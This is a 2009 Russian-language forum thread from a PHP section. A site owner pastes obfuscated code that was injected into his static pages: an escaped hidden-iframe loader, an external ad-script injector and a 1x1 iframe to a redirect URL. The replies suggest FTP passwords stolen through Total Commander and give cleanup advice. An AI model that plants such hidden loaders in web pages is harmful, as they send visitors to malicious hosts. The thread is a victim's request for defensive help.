Появляется левый код!!!!

Тема в разделе "PHP", создана пользователем CAHEk1986, 25 мар 2009.

Статус темы:
Закрыта.
Модераторы: latteo
  1. CAHEk1986

    CAHEk1986 Создатель

    Регистр.:
    13 фев 2008
    Сообщения:
    43
    Симпатии:
    3
    Сделал небольшой сайт визитку, полностью статичный. Залил на хостинг.
    На локальном сервере все нормально, код чистый. Залил на хостинг, тоже все норм хорошо. Но через пару дней обнаружил в коде странице вот такую хрень:
    <body><!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(unescape('')+'<i'+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+''+'e '+unescape('%69%64')+unescape('%3D')+unescape('%22%62%65')+'512'+'c4'+unescape('%61%64%37%64')+unescape('%66%36%33%37')+unescape('%35%32%38')+unescape('%34%32%36')+'6b'+unescape('%66')+'248'+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(51)+''+'4f"'+' na'+'me='+String.fromCharCode(34)+String.fromCharCode(101)+''+unescape('%63%63%37%30')+String.fromCharCode(54)+String.fromCharCode(51)+String.fromCharCode(55)+String.fromCharCode(53)+''+unescape('%35%61')+'3f'+unescape('%32')+unescape('%63%31%30%65')+unescape('%32%31%36%64')+String.fromCharCode(51)+String.fromCharCode(48)+''+String.fromCharCode(100)+String.fromCharCode(48)+String.fromCharCode(53)+''+unescape('%63%37%32')+unescape('%33%62%22%20')+String.fromCharCode(32)+''+unescape('%77%69%64%74')+unescape('%68%3D%31')+' '+'heig'+String.fromCharCode(104)+String.fromCharCode(116)+''+unescape('%3D%31%20%66')+unescape('%72%61%6D%65')+'bo'+String.fromCharCode(114)+String.fromCharCode(100)+String.fromCharCode(101)+''+unescape('%72%3D')+unescape('%30%20')+'src'+unescape('%3D%22')+'htt'+unescape('%70%3A%2F%2F')+'th'+unescape('%65')+unescape('%68%75')+unescape('%67%65%74')+unescape('%69%74')+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(111)+''+String.fromCharCode(112)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(110)+''+String.fromCharCode(47)+String.fromCharCode(100)+String.fromCharCode(111)+''+String.fromCharCode(110)+''+unescape('%74%73%74%6F')+String.fromCharCode(112)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+''+'ml'+unescape('%22%3E')+String.fromCharCode(60)+String.fromCharCode(47)+''+unescape('%69%66%72%61')+unescape('%6D%65%3E')+'');</SCRIPT><!-- /ad -->


    <script language="javascript">function sADS(sIteId) {var thisHome=document;var sIteName=thisHome.location.hostname;var adsurl='crew%2eabnc-portal%2ecom%2F';var adScript='%3Cscr'+'ipt src="http%3A%2F%2F'+adsurl+'show.js?c=';thisHome.write(unescape(adScript+sIteId+'&s='+sIteName+'"%3E%3C/scr'+'ipt%3E'));}sADS("CP-005323-3");</script>
    <iframe frameborder=0 border=0 height=1 width=1 src="http://strhq.cn/tds_a/go.php?id=2" /></body>

    Перепроверил ещё раз на локальном сервере, код чистый, без этой галиматьи. Ещё раз залил на хост и опять через пару дней появился этот код. Хостинг Джино. Это я лох или проблемы у хостера?
     
  2. -=Xardas=-

    -=Xardas=-

    Регистр.:
    17 сен 2008
    Сообщения:
    250
    Симпатии:
    58
    Ломанули тебя судя по всему :) Поменяй пароли на фтп и замени все файлы на оригинал. :)
     
    CAHEk1986 нравится это.
  3. NoN

    NoN Постоялец

    Регистр.:
    25 ноя 2008
    Сообщения:
    79
    Симпатии:
    33
    Надеюсь в качесве ftp клиента не используеш Total Commander? так как с них пароли тырятся...
     
    CAHEk1986 нравится это.
  4. CAHEk1986

    CAHEk1986 Создатель

    Регистр.:
    13 фев 2008
    Сообщения:
    43
    Симпатии:
    3
    Его родного и использую))) Посоветуйте тогда другой клиент!?
     
  5. AleXSuS

    AleXSuS

    Регистр.:
    27 фев 2009
    Сообщения:
    195
    Симпатии:
    55
    CuteFTP 8 Professional
     
  6. t0os

    t0os

    Регистр.:
    21 окт 2007
    Сообщения:
    284
    Симпатии:
    36
    FileZilla - бесплатный, быстрый, удобный, простой. Пассы на админку смени (если есть), на базу (если опять же, есть).
     
  7. CAHEk1986

    CAHEk1986 Создатель

    Регистр.:
    13 фев 2008
    Сообщения:
    43
    Симпатии:
    3
    Да не никакой админки и базы нету. Обычный статический сайт. Все поменял, залил буду ждать.... Но если все же опять повится что тогда, в сапорт к хостеру?
     
  8. zakaji

    zakaji

    Регистр.:
    8 сен 2007
    Сообщения:
    407
    Симпатии:
    171
    Компа своего почисть, если пароли украли то где-то вирь сидит:-]
     
  9. Arqin

    Arqin

    Регистр.:
    17 мар 2009
    Сообщения:
    185
    Симпатии:
    37
    Если повторится, то к хостеру тоже обязательно обратись и поставь в курс, того что происходит.
     
  10. virtualbrest

    virtualbrest

    Регистр.:
    6 май 2007
    Сообщения:
    210
    Симпатии:
    18
    Проходили еще пару лет назад, теперь уже больше года - тишина. Рецепт - Тотал 7.02 и выше, только в нем закрыли дырку (если не хош отказываться от тотала), смена всех паролей на FTP, чистка компа от гадости и если уж 100% надо застраховаться - на index.html или что там у тебя запускается - права на запись снять, тогда точно никто не влезет, сайты редко обновляются с index, обычно там какой-то обработчик стоит, а вирь влазит именно в него.
     
Статус темы:
Закрыта.